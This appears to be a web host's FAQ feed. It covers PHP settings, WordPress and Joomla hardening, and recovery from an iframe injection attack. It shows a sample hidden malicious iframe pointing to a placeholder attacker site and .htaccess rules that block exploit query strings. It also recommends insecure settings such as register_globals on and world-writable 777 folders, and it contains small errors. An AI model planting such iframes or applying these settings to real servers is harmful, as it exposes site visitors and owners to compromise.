<![CDATA[FastWebHost]]> <![CDATA[Can I have register globals turned on?]]> Yes, just add the following to the .htaccess file located in the public_html folder:
php_flag register_globals on

]]> <![CDATA[Troubleshooting an IFrame Injection Attack]]> IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. If you have recently got an iframe attack to your website, do not panic. Here are a few things that you can do immediately after you discovered that your website has been a victim of an iframe injection attack.

<iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden"></iframe>
An example of a malicious IFRAME injection code

1. Take your website down for a certain period
It is recommended to take the website down as you do not want to be distributing malware or virus from your website to your visitors. The website should be offline while you are recovering the site.

2. Change all the passwords
Although this may seem like a simple step, many people, including myself, often fail to change all the passwords immediately after an attack has been discovered. You need to change all the passwords associated with the website; which include ftp passwords, ssh passwords, account passwords, database passwords, admin passwords and so on.

3. Take a copy of the affected website for further analysis
You may want to do a further analysis on the attack and might need to refer to the exact injection source code in the future. Take a copy of the affected website in a compressed format, eg: zip or gzip and store it in an quarantine area for later reference. Note that it is not advisable to keep the affected files on the server.

4. Replace the entire site with a clean backup copy
Do not rely on your hosting provider for a backup copy of your site. Many hosting providers say they do an automatic backup every night, however, it is more reliable if you have other backup solutions for your website. Scan your backup copy with Anti-Virus software like ZoneAlarm or Trend Micro (use cupon code trendpro to get 10% Off Trend Micro Internet Security Pro 2010) before uploading to the web server to ensure that the backup copy is free from viruses and Trojan horses.

5. Test the website and reopen
This is to make sure that the website is reverted to its clean, original version. Once you are happy with the result, you can reopen the website to the public.

6. Analyse how the attack was originated
In order to ensure that the same attack does not happen again, you will need to do a full analysis of the attack and how it was originated. Was it because of a security hole in your application? Was it caused by a weak file permission? Or is your server affected with some virus that injects these code into your website at regular interval? You will need to understand how it happens in order to prevent it in the future. And when necessary, obtain an expert advice.

7. Perform appropriate security measures based on the analysis
Although you may have recovered your website, it does not mean your website will not be attacked again. If the same security hole still exists, it is probably very likely that the website will be attacked again in the near future. Therefore, it is recommended that you perform necessary security measures, be it hardening your web server, upgrading an application, or introducing new security restrictions.

Advice about Ifram attacks :-

The common causes seem to be as follows:

* The website is using an old version of an open source application (eg: WordPress 1.0) which has known security issues
* File permissions on the server are not set accordingly (eg: every file and folder on the server is set to 777 read-write-execute)
* Weakness in an application code. For example, there is not sufficient input validation.
* FTP rather than SFTP is used
* There is no IP restriction for SSH and FTP accounts

There are a few simple things that can be done to reduce the risk of your website being attacked.

* Change your passwords periodically (say, at least once a month)
* Keep your applications up-to-date. Always upgrade immediately when a new version is available.
* Clean up files and directories on the web server. Make sure there is no old file with .bak or .txt extensions lying around
* Ensure that appropriate file permissions are used for every file and directory on the web server
* Consult with a security expert to obtain the best advice

 

]]> <![CDATA[WordPress is giving error: "Missing a temporary folder" while up...]]>
If you are receiving this error please follow these simple  instructions below:

1. Create a "tmp" folder in your WordPress root directory with 777 permissions. This can be done by your FTP program.

2. Also create a "php.ini" file in same location.

3. Add the following in php.ini file:

upload_max_filesize = 16M
upload_tmp_dir = on
upload_tmp_dir = /home/username/public_html/wordpressDir/tmp

Please make sure to replace username with your hosting username, and wordpressDir with the directory name of your WordPress install.
If you have installed WordPress on your homepage then the path will be like: upload_tmp_dir = /home/username/public_html/tmp

4. Copy the same php.ini file to your wp_admin folder.

That's it.
]]> <![CDATA[How to enable: allow_url_fopen]]> This can be done via your php.ini file by adding the following line:

allow_url_fopen = On

The php.ini file is where you declare changes to your PHP settings. You can edit the existing php.ini, or create a new text file in any subdirectory and name it php.ini.

]]> <![CDATA[Can we install SSL for Addon domains?]]> Yes, we can install SSL for an Addon domain name.

Every SSL certificate requires a domain name and a dedicated IP address. Shared web hosting accounts can host multiple domains, but all of the domains share the same IP address. We can only assign one IP address per account, therefore we can only allow one private SSL certificate per cPanel.

If you need multiple SSL certificates or multiple IP addresses, please purchase a reseller account or multiple shared web hosting accounts.

]]> <![CDATA[WordPress Security]]> Wordpress Security

Wordpress is being used by a lots of users as it is user-friendly in developing sites and is available free of cost. Despite these advantage it has many loopholes that cannot be ignored. Wordpress team is continuously working and bringing forth new versions to the market but still the vulnerabilites are increasing every day on the internet. Some of the security loopholes in wordpress sites are as given below :

1) Without-charge WordPress themes have security issues
2) WordPress’s default login is unsafe
3) It is vulnerable to URL hacking and other security attacks

Steps to decrease Vulnerablilites
=================================
1) Moving wp-config.php file:

wp-config.php is the most inportant file in wordpress which you need to protect from being accessed directly so instead of keeping it in public_html folder you can move it one folder back. Below are the steps.

STEP 1: Download your wp-config.php file to local computer.

STEP 2: Now upload this file to any folder just one level above public-html or www folders. In short you have to upload it outside to public-html folder (if you have installed WordPress in root).

STEP 3: Now open your original wp-config.php (old) file and replace everything inside it with this code.

======================
<?php
include('/home/username/wp-config.php');
?>
======================

2) Stop directory listing:

By default any readable folder that is not having index file lists all the files inside when browsed. To avoid listing your files you can create index files in all the readable folders. Here is a better, more trusted and less time consuming solution. Just open your .htaccess file and add this code anywhere within it.

=====================
IndexIgnore *
=====================

You need to go through the below url for further details on securing wordpress site
============
http://codex.wordpress.org/Hardening_WordPress
============

]]> <![CDATA[Secure your joomla site]]> Tips to secure your joomla site

Securing your site is rather easy, if you know what, where, and how it needs to be completed. This article may only scratch the surface, but will provide you with enough advice to perform a major upgrade in your site’s security in a few, easy steps.


1. Change the default database prefix (jos_)

Most SQL injections that are written to hack a Joomla! website, try to retrieve data from the jos_users table. This way, they can retrieve the username and password from the super administrator of the website. Changing the default prefix into something random, will prevent (most / all) SQL injections.

You can set the database prefix when installing your Joomla! website. If you've already installed Joomla! and want to change your prefix, do the following:
   * Log on to your Joomla! back-end.
   * Go to your global configuration and search for the database
   * Change your database prefix (Example: fdasqw_) and press Save.
   * Go to phpMyAdmin to access your database.
   * Go to export, leave all default values and press Start. Exporting the database can take a while.
   * When done, select all code and copy it to notepad (or any other text editor)
   * In phpMyAdmin, select all tables and delete them
   * In notepad, do a Search & replace (Ctrl + H). Set the searchterm to jos_ and change it into your new prefix (Example: fdasqw_). Press "Replace all".
   * Select everything in your notepad file and copy it. In phpMyAdmin, go to SQL, paste the queries and press Start.

2. Remove version number / name of extensions

Most vulnerabilities only occur in a specific release of a specific extension. Showing MyExtension version 2.14 is a really bad thing. You can modify this message to only the name of the extension by doing the following:

    * Retrieve all files of the extension from your server.
    * Open up Dreamweaver.
    * Load any file from the extension that you just downloaded to your local machine.
    * Use the Search function and set the search to Search through specified folder. Navigate to the folder where you downloaded the exploit to.
    * Set the search term to "MyExtension version 2.14" and press OK.
    * When found the correct file, remove the version number.
    * Upload the changed file to your server and check if the changes are made.

3. Use a SEF component

Most hackers use the Google inurl: command to search for a vulnerable exploit. Use Artio, SH404SEF or another SEF component to re-write your URL's and prevent hackers from finding the exploits.

Additionally, you'll get a higher rank in Google when using search engine friendly URL's.

4. Keep Joomla! and extensions up to date

This one is pretty obvious. Always check for the latest versions of Joomla! and the extensions you're using. Many vulnerabilities are resolved most of the times in later versions.

5. Use the correct CHMOD for each folder and file

Setting files or folders to a CHMOD of 777 or 707 is only necessary when a script needs to write to that file or directory. All other files should have the following configuration:

    PHP files: 644
    Other folders: 755

6. Delete leftover files

When you installed an extension that you didn't like, don't set the extension to unbublished. If you do, the vulnerable files will still be on your website. So simply use the un-install function to totally get rid of the extension.

7. Change your .htaccess file

Add the following lines to your .htaccess file to block out some common exploits.

Open your .htaccess file
########## Begin - Rewrite rules to block out some common exploits
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]
# Block out any script that includes a < script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2}) [OR]
# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)
RewriteCond %{QUERY_STRING} CONFIG_EXT([|%20|%5B).*= [NC,OR]
# Block out any script that tries to set sbp or sb_authorname via URL (simpleboard)
RewriteCond %{QUERY_STRING} sbp(=|%20|%3D) [OR]
RewriteCond %{QUERY_STRING} sb_authorname(=|%20|%3D)
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits


]]> <![CDATA[Reporting Site Attack]]> This is a concern to many of us Hosters and after some in-depth research, it would seem the most likely cause is that your personal computer is infected. Strange as that may sound, hackers are using a variation of Trojans to infect personal computers and then use your own FTP login information, to change the Index page and/or other targeted pages on your own site. Therefore we request you to scan your
computer with a good anti-virus for infected files. Also use Internet protection tools.

if you don't, you can have computer checked for viruses for free - using the free HouseCall from TrendMicro (http://housecall.trendmicro.com/). They are a very respected company when dealing with Virus related problems. You can feel secure in using their HouseCall program to access/clean your computer.

Once you done that please delete files under public_html and upload them again.

Steps to follow:

Step 1: Install a new anti-virus program. Obviously this virus knows how to evade detection of the current anti-virus. It doesn't matter what's being used currently, you have to install something different.
Step 2: Login to your control and change your FTP password. Write it down at this point DO NOT ACCESS YOUR SITE with FTP until you finish all of these steps.
Step 3: Scan and clean every PC that has FTP access to your site. This is also a must. Otherwise you have no idea who's PC it is. Do not give the new FTP passwords to anyone until after you have finished all of these steps.
Step 4: Remove the malicious code from your webpages. If you have a known good back-up, use that. If not, download your site (yes you'll have to type in the new password, but hopefully you're already scanned and cleaned your PC). Then open each file in your HTML editor and find the infectious code. This particular malscript usually hides immediately after the opening body tag, but we've also seen it at the end of files. You'll have to check every file on your website not just index files or just html files. Check every file on your website even .js and .css files.
Step 5: Change your FTP passwords again.
Step 6: Please request a delisting through your Google Webmaster account. This is not something that Team of FastWebHost can do for you. The excerpt below was copied from Google, and gives you step by step instructions to request a delisting.
 
http://www.google.com/support/webmasters/bin/answer.py?answer=45432
Once you have reviewed your site and are sure it is clean, you can can submit a request for review. Note, you will need to verify site ownership before you can request a site review.
    Sign in to Webmaster Tools with your Google account.
    On the Dashboard, select the site you want.
    On the Overview page, click Request a review and follow the instructions.
Then you should have that issue again.
This is not the result of a faulty script or weak FTP passwords. It's the result of a virus on PC with FTP access to the infected website

]]>